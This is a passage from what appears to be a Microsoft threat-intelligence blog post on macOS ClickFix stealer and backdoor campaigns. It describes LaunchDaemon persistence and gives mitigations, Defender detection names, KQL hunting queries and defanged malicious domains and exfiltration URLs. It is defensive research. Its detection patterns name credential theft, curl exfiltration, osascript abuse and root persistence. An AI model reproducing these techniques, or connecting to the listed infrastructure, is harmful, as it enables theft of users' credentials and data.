After prompting the victim for their macOS password and validating it, the script escalates privileges to establish system-level persistence. It constructs a LaunchDaemon plist, stages the XML content to a temporary file (/tmp/starter), and then writes it to /Library/LaunchDaemons/com.finder.helper.plist.
LaunchDaemon plist staging and loading
The LaunchDaemon is configured to run /bin/bash with the path to ~/.agent as its argument, rather than invoking the backdoor binary directly. As shown in Figure 25, the script sets the correct ownership, loads the daemon using launchctl, and enables both RunAtLoad and KeepAlive.
Figure 24. Plist staging.
As a result, on every system boot, launchd runs the .agent wrapper with root privileges, which in turn ensures that the .mainhelper backdoor process is running.
Figure 25. Plist loading.
Mitigation and protection guidance
Apple XProtect has updated signatures to protect users against this threat. Additionally, in macOS 26.4 and later, Apple has introduced a mitigation that directly addresses the ClickFix delivery mechanism.
When a user attempts to paste a potentially malicious command into Terminal, they will now see the following prompt:
Possible malware, Paste blocked
Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy. These instructions are commonly offered via websites, chat agents, apps, files, or a phone call.
Organizations can also follow these recommendations to mitigate this threat:
Educate users. Warn them against running instructions from untrusted sources.
Monitor Terminal usage. Alert on suspicious Terminal or shell sessions spawned by installers or user apps.
Detect native tool abuse. Flag unusual sequences of macOS utilities (curl, Base64, Gunzip, osascript, and dscl).
Inspect outbound downloads. Monitor curl activity fetching encoded or compressed payloads from unknown domains.
Protect credential stores. Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.
Monitor data staging. Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.
Enable endpoint protection. Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living‑off‑the‑land behavior.
Restrict C2 traffic. Block outbound connections to suspicious or newly registered domains.
Microsoft also recommends the following mitigations to reduce the impact of this threat.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Allow investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to mitigate attackers from using local administrator privileges to set antivirus exclusions.
Microsoft Defender detections
Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic: Execution
Observed activity:
User copies, pastes, and runs Base64 instructions
Base64 instructions are deobfuscated
Executable files are created from the remote attacker’s infrastructure
The installed malware implant is executed
Malicious AppleScript is retrieved from attacker infrastructure
A sequence of malicious instructions is executed
Microsoft Defender for Endpoint:
Suspicious shell command execution
Obfuscation or deobfuscation activity
Executable permission added to file or directory
Suspicious launchctl tool activity
‘SuspMalScript’ malware was prevented
Possible AMOS stealer activity
Suspicious AppleScript activity
Suspicious piped command launched
Suspicious file or information obfuscation detected
Microsoft Defender Antivirus:
Trojan:MacOS/Multiverze – Created executable file
Trojan:MacOS/SuspMalScript – Malware implant downloaded by the loader campaign
Behavior:MacOS/SuspAmosExecution – Malicious file execution
Behavior:MacOS/SuspOsascriptExec – Malicious osascript execution
Behavior:MacOS/SuspDownloadFileExec – Suspicious file download and execution
Behavior:MacOS/SuspiciousActiviyGen

Tactic: Data collection
Observed activity:
Malware collects data from bash history, browser credentials, and other sensitive folders
Multiple files are collected into staging folders
Collected data is staged and archived into a folder
Staging folders are removed
Microsoft Defender for Endpoint:
Suspicious access of sensitive files
Suspicious process collected data from local system
Enumeration of files with sensitive data
Suspicious archive creation
Suspicious path deletion
Microsoft Defender Antivirus:
Behavior:MacOS/SuspPassSteal – Suspicious process collected data from local system
Trojan:MacOS/SuspDecodeExec – Malicious plist detection

Tactic: Defense evasion
Observed activity:
Malware deletes the staging paths following exfiltration
Execution of obfuscated code to evade inspection
Microsoft Defender for Endpoint:
Suspicious path deletion
Suspicious file or information obfuscation detected

Tactic: Credential access
Observed activity:
Malware steals user account credentials and stages files for exfiltration
Microsoft Defender for Endpoint:
Suspicious access of sensitive files
Unix credentials were illegitimately accessed

Tactic: Exfiltration
Observed activity:
Malware exfiltrates staged data using curl and HTTP POST
Microsoft Defender for Endpoint:
Possible data exfiltration using curl
Microsoft Defender Antivirus:
Behavior:MacOS/SuspInfoExfil
Trojan:MacOS/SuspMacSyncExfil
Threat intelligence reports
Microsoft Defender customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender
Microsoft Defender customers can run the following queries to find related activity in their networks:
Initial access
//Loader campaign installation
DeviceNetworkEvents
| where InitiatingProcessCommandLine has_any ("loader.sh?build=","payload.applescript?build=")
// Helper campaign installation
DeviceFileEvents
| where InitiatingProcessCommandLine has_all("curl", "/tmp/helper","-o")
//Helper campaign /tmp/update variant installation
DeviceFileEvents
| where InitiatingProcessCommandLine has_all("curl", "/tmp/update","-o")
| where FileName== "update"
Exfiltration to C2 infrastructure
//loader campaign
DeviceProcessEvents
| where ProcessCommandLine has_all("curl", "post","/debug/event", "build_hash")
DeviceProcessEvents
| where ProcessCommandLine has_all("curl","/tmp","post","-H","-f","build","/gate")
| where not (ProcessCommandLine has_any(".claude/shell-snapshots"))
//script campaign
DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all ("curl","-F","txid","zip","max-time")
//helper campaign
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("curl","post","-H","user","buildid","cl","cn","/tmp/")
Bot C2 installation and communication
//loader campaign - bot install
DeviceFileEvents
| where InitiatingProcessCommandLine =="base64 -d"
| where FolderPath endswith @"Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"
//loader campaign – bot communication
DeviceProcessEvents
| where ProcessCommandLine has_all("/api/bot/heartbeat","post","curl")
//script campaign second stage execution
DeviceProcessEvents
| where ProcessCommandLine has_all("curl","POST","txid","osascript","bmodule","max-time")
//helper campaign - bot install
//Alternate query for helper or bot update installation
DeviceFileEvents
| where InitiatingProcessCommandLine has_all ("curl","zxc","kito")
DeviceProcessEvents
| where InitiatingProcessFileName =="osascript"
| where ProcessCommandLine has_all ("sh","echo","-c", "cp","/tmp/starter",".plist")
Indicators of compromise
Domains distributing ClickFix
The following domains were observed distributing ClickFix instructions:
cleanmymacos[.]org
mac-storage-guide.squarespace[.]com
claudecodedoc[.]squarespace[.]com
domenpozh[.]net
macos-disk-space[.]medium[.]com
macclean[.]craft[.]me
apple-mac-fix-hidden[.]medium[.]com
Loader campaign
The following domains were used for payload delivery and C2:
rapidfilevault4[.]sbs
coco-fun2[.]com
nitlebuf[.]com
yablochnisok[.]com
mentaorb[.]com
seagalnssteavens[.]com
res2erch-sl0ut[.]com
filefastdata[.]com
metramon[.]com
octopixeldate[.]com
pewweepor092[.]com
bulletproofdomai2n[.]com
benefasts-fhgs2[.]com
repqoow77wiqi[.]com
do2wers[.]com
rapidfilevault4[.]cyou
reews09weersus[.]com
pepepupuchek13[.]com
pewqpeee888[.]com
wewannaliveinpicede[.]com
datasphere[.]us[.]com
rapidfilevault5[.]sbs
coco2-hram[.]com
poeooeowwo777[.]com
korovkamu[.]com
metrikcs[.]com
metlafounder[.]com
terafolt[.]com
haploadpin[.]com
rawmrk[.]com
mikulatur[.]com
milbiorb[.]com
doqeers[.]com
we2luck[.]com
quantumdataserver5[.]homes
bintail[.]com
molokotarelka[.]com
trehlub[.]com
avafex[.]com
rhymbil[.]com
boso6ka[.]com
res2erch-sl2ut[.]com
pilautfile[.]com
bigbossbro777[.]com
miappl[.]com
peloetwq71[.]com
fastfilenext[.]com
beransraol[.]com
pelorso90la[.]com
medoviypirog[.]com
wewannaliveinpice[.]com
malkim[.]com
pipipoopochek6[.]com
hello-brothers777[.]com
dialerformac[.]com
persaniusdimonica8[.]com
hilofet[.]com
tmcnex[.]com
nibelined[.]com
pissispissman[.]com
bankafolder[.]com
perewoisbb0[.]com
us41web[.]live
uk176video[.]live
jihiz[.]com
beltoxer[.]com
swift-sh[.]com
hitkrul[.]com
kofeynayagush[.]com
Script campaign
The following URLs were used for payload delivery:
hxxps://cauterizespray[.]icu/script[.]sh
hxxps://enslaveculprit[.]digital/script[.]sh
hxxps://resilientlimb[.]icu/script[.]sh
hxxps://thickentributary[.]digital/script[.]sh
hxxp://paralegalmustang[.]icu/script[.]sh
hxxps://round5on[.]digital/script[.]sh
hxxps://qjywvkbl[.]degassing-mould[.]digital
hxxps://zg5mkr7q[.]apexharvestor[.]digital
hxxps://kvrnjr30[.]apexharvestor[.]digital
hxxps://yygp4pdh[.]apexharvestor[.]digital
hxxps://t[.]me/ax03bot

The following domains and IP address were used for payload delivery, C2, and exfiltration:
0x666[.]info
honestly[.]ink
95.85.251[.]177
pla7ina[.]cfd
play67[.]cc
Helper campaign
The following domains were used for payload delivery:
rvdownloads[.]com
famiode[.]com
contatoplus[.]com
woupp[.]com
saramoftah[.]com
ptrei[.]com
wriconsult[.]com
kayeart[.]com
ejecen[.]com
stinarosen[.]com
biopranica[.]com
raxelpak[.]com
octopox[.]com
boosterjuices[.]com
ftduk[.]com
dryvecar[.]com
vcopp[.]com
kcbps[.]com
jpbassin[.]com
isgilan[.]com
arkypc[.]com
hacelu[.]com
stclegion[.]com
xeebii[.]com

The following URLs served as exfiltration endpoints:
hxxp://138.124.93[.]32/contact
hxxp://168.100.9[.]122/contact
hxxp://199.217.98[.]33/contact
hxxp://38.244.158[.]103/contact
hxxp://38.244.158[.]56/contact
hxxp://92.246.136[.]14/contact
hxxps://avipstudios[.]com/contact
hxxps://joytion[.]com/contact
hxxps://laislivon[.]com/contact
hxxps://mpasvw[.]com/contact
hxxps://lakhov[.]com/contact
Update campaign infrastructure
The following domains delivered the update install variant of the helper campaign:
reachnv[.]com
vagturk[.]com
futampako[.]com
octopox[.]com
lbarticle[.]com
raytherrien[.]com
joeyapple[.]com
This research is provided by Microsoft Defender Security Research with contributions from Arlette Umuhire Sangwa, Kajhon Soyini, Srinivasan Govindarajan, Michael Melone, and members of Microsoft Threat Intelligence.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.